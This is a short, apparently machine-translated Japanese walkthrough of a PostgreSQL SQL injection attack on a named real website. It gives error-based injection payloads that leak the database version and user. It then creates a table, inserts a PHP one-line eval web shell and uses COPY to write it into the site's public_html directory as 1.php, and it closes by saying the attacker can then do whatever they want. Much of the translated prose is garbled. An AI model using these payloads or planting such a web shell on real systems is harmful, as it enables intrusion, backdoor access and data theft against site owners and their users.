最初のステップは同じであるが、そこに注入されるかどうかを決定するためにどのような注射は、前置きです。
- postgers同様のrootユーザの
データベースのバージョン情報へのアクセスを
and 1=cast(version() as int)
現在のユーザ名を取得します。
and 1=cast(user||123 as int)
これは、すべてのpostgersユーザーを見つけ始めました。。。
そして、テーブルCCCを作成します
;create table ccc(w text not null);
あなたは馬を書くために始めることができる良いテーブルを作成します。
;insert into ccc values($$<?php @eval($_POST[aaa]);?>$$);
その後、彼は障害がに/ホーム/ kasugai_tochi / public_htmlの/スクリプト/このパスで報告されたところ、彼に与えられているものを参照するパスを引き出し
;copy ccc(w) to $$/home/kasugai_tochi/public_html/script/1.php$$;
その後オープン1.php、書かれている場合の説明を空白成功。ここで(オリジナルURLがhttp://www.kasugai-tochi.jp/kensaku/data.php?id=307で、新しいはhttp://www.kasugai-tochi.jp/script/1.phpです)変更は、自分の道を理解する必要があります。
それでは、オープンキッチンナイフ、あなたは彼らがやりたいことができます。